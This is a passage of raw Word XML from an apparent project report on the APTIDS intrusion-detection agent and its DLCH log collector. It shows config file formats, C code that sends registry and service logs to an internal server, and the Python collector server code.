        </w:rPr>
        <w:t>## This is System Information File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 You can Modify it and save with ASCII or UTF8 encoding</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&lt;ComputerName&gt;P3N3TR4T10N&lt;/ComputerName&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsid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&lt;WindowsVersion&gt;10.0&lt;/WindowsVersion&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002565A7" w:rsidRDefault="002565A7" w:rsidP="00EF58FF">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002565A7" w:rsidRDefault="00EF58FF" w:rsidP="00EF58FF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Networking</w:t>
      </w:r>
      <w:r w:rsidR="002565A7">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> is called by WriteLog, it defines some essential variables:</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Networking(</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pServerIP, pPort;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pStart, pEnd;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pBuffer;</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Style w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>pServerIp: A string for storing Server’s IP Address</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002565A7" w:rsidRDefault="002565A7" w:rsidP="002565A7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">pPort: A string for storing Server’s port </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002565A7" w:rsidRDefault="000B77BF" w:rsidP="002565A7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>dwPort: A DWORD variable for storing Server’s port, this is the number converted from pPort using “atoi” function.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B77BF" w:rsidRDefault="00202D03" w:rsidP="000B77BF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Firstly, Networking reads “Networking.conf” which is a file stores information such as Server IP address and port. Networking uses this information for connecting to a server implemented in DLCH.</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Networking configuration that Agent uses to connect to Server</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You can modify it and save it as ASCII format or UTF8 format</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&lt;Server&gt;192.168.100.21&lt;/Server&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00202D03" w:rsidRPr="000B77BF"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&lt;Port&gt;55679&lt;/Port&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF58FF" w:rsidRDefault="00EF58FF" w:rsidP="00EF58FF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00202D03">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>When we need to change the Server’s IP, we only have to modify the information between “&lt;Server&gt;” and “/Server&gt;”</w:t>
      </w:r>
      <w:r w:rsidR="004827A8">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> tags, or modify the number between “&lt;Port&gt;” and “&lt;/Port&gt;” to change server port.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE0062" w:rsidRDefault="00AE0062" w:rsidP="00AE0062">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Networking then calls “SendLogToServer” passing the Server IP address and Port for connecting to DLCH.</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SendLogToServer(</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pServerIP</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dwPort</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 GETTING LOCAL SYSTEM INFORMATION ===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dwByteRead,</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dwResult;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pWindowsVersion;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00010AEF" w:rsidRDefault="008847F5" w:rsidP="00010AEF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">To distinguish between log data of different computers in network, we decided to store log data in files which use computer </w:t>
      </w:r>
      <w:r w:rsidR="00010AEF">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>name and version as file’s name. For example, if the computer name is “P3N3TR4T10N” and its window</w:t>
      </w:r>
      <w:r w:rsidR="003A23CE">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>s version is 10.0, the log file will be named “P3N3TR4T10N.</w:t>
      </w:r>
      <w:r w:rsidR="00010AEF">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>10.0.log”. Since rarely computer names are duplicated in the same LAN or Domain, this approach helps in distinguish between machines for long term, rather than based on IP address which could easily be changed due to the operation of DHCP.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B5278" w:rsidRDefault="00010AEF" w:rsidP="000B5278">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>SendLogToServer reads information in “System.info” to get computer name and version. If the file does not exist or contains NULL, APTIDS stops sending that log to DLCH</w:t>
      </w:r>
      <w:r w:rsidR="000B5278">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00594D87">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> SendLogToServer calls “ParseData”, a function for getting information between the predefined tag and its appropriate ending tag.</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System Infomatin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pInfoFile = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>"Config/System.info"</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hInfoFile = CreateFileA(pInfoFile,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0, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>OPEN_EXISTING</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>, 0, 0);</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dwErrorCode = GetLastError();</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file does not exist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L"Cannot open System Information file: ERROR_FILE_NOT_FOUND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//Read from Info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pInfoBuffer = (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>PCHAR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>)calloc(</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ReadFile(hInfoFile, pInfoBuffer,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//Close File Handle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CloseHandle(hInfoFile);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Check weather Config File contains NULL</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(dwByteRead == 0)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L"System Information file contains NULL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Getting Computer Name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pComputerName = ParseData(pInfoBuffer, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>"&lt;ComputerName&gt;"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"Computer Name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Getting Windows Version</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pWindowsVersion = ParseData(pInfoBuffer, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>"&lt;WindowsVersion&gt;"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(pWindowsVersion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"Windows Version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rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00010AEF" w:rsidRDefault="00594D87" w:rsidP="00010AEF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">SendLogToServer connects to DLCH, DLCH will return another available port upon any connection. SendLogToServer terminates the previous connection and reconnects to the new received port. That connection now in used for sending log data to DLCH. </w:t>
      </w:r>
      <w:r w:rsidR="00D42607">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>According to type of log data which is specified by APTIDS’</w:t>
      </w:r>
      <w:r w:rsidR="002723A5">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>s modules.</w:t>
      </w:r>
      <w:r w:rsidR="00B81AF2">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> APTIDS firstly send to Server its local Computer Name and Windows </w:t>
      </w:r>
      <w:r w:rsidR="00B81AF2">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Version on the default port for identify itself. Then it sends log data for storing on server using the returned port number.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hRegFile = CreateFileW(</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L"Logs/tmpRegistry.log"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dwErrorCode = GetLastError();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ReadFile(hRegFile, lpRegBuffer,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&amp;dwRegByteRead,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L"%s\n"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>, lpRegBuffer);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CloseHandle(hRegFile);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(dwRegByteRead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dwByteNeeded = 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pRegBuffer = (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>LPSTR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>)calloc(dwByteNeeded,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"Sending Registry Log to Server: %s \n"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>, 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send(ConnectSocket, (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>LPSTR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>)pRegBuffer,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hSvcFile = CreateFileW(</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L"Logs/tmpService.log"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dwErrorCode = GetLastError();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ReadFile(hSvcFile, lpSvcBuffer,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&amp;dwSvcByteRead,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A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>L"%s\n"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>, lpSvcBuffer);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CloseHandle(hSvcFile);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(dwSvcByteRead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dwByteNeeded = WideCharToMultiByte(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pSvcBuffer = (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>LPSTR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>)calloc(dwByteNeeded,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WideCharToMultiByte(</w:t>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"%d\n"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">, dwByteNeeded); </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>//Debut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"Sending Service Log to Server: %s \n"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>, 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send(ConnectSocket, (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>LPSTR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>)pSvcBuffer,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rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00326F1A" w:rsidRDefault="00326F1A">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F1CBF" w:rsidRDefault="00326F1A" w:rsidP="00326F1A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="104" w:name="_Toc485239608"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Sentry Forensic Source code</w:t>
      </w:r>
      <w:bookmarkEnd w:id="104"/>
      <w:r w:rsidR="006F1CBF">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="002723A5" w:rsidRDefault="006F1CBF" w:rsidP="006F1CBF">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="105" w:name="_Toc485239609"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Distributed Log Collector Hardware and Centralized Log Storage System</w:t>
      </w:r>
      <w:bookmarkEnd w:id="105"/>
    </w:p>
    <w:p w:rsidR="006F1CBF" w:rsidRDefault="00EA71C0" w:rsidP="00EA71C0">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="106" w:name="_Toc485239610"/>
      <w:r>
        <w:t>Distributed Log Collector Hardware</w:t>
      </w:r>
      <w:bookmarkEnd w:id="106"/>
    </w:p>
    <w:p w:rsidR="00BA1B83" w:rsidRDefault="00BA1B83" w:rsidP="00BA1B83">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>Server’s source code</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BA1B83" w:rsidRDefault="00BA1B83" w:rsidP="00BA1B83">
      <w:r>
        <w:t>DLCH implements a server for receiving connection from APTIDS agent on monitored systems. The server binds to</w:t>
      </w:r>
      <w:r w:rsidR="003A23CE">
        <w:t xml:space="preserve"> a default</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> port</w:t>
      </w:r>
      <w:r w:rsidR="003A23CE">
        <w:t>, which currently set to</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> “55679”</w:t>
      </w:r>
      <w:r w:rsidR="003A23CE">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to receive request from client.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BA1B83" w:rsidRDefault="00BA1B83"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A1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Server():</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 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR,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sock.bind((host, port))</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        sock.listen(</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>5</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(csock, caddr) = sock.accept()</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">            ComputerName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"Computer: {}"</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>.format(ComputerName)</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"Windows Version: {}"</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>.format(WindowsVersion)</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">            sock2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">            sock2.bind((host, </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>))</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">            uport = sock2.getsockname()[</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sock2.close()</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">            csock.send(str(uport) + </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="008000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>\n</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="008000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">            thread.start_new_thread(DataChannel, (uport, ComputerName, WindowsVersion))</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">if </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">__name__ == </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="008000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>"__main__"</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    Server()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A23CE" w:rsidRDefault="003A23CE"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 xml:space="preserve">On the first connection from APTIDS, APTIDS sends its computer name and windows version to Server. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B81AF2" w:rsidRDefault="00B81AF2" w:rsidP="00B81AF2">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">            ComputerName=</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
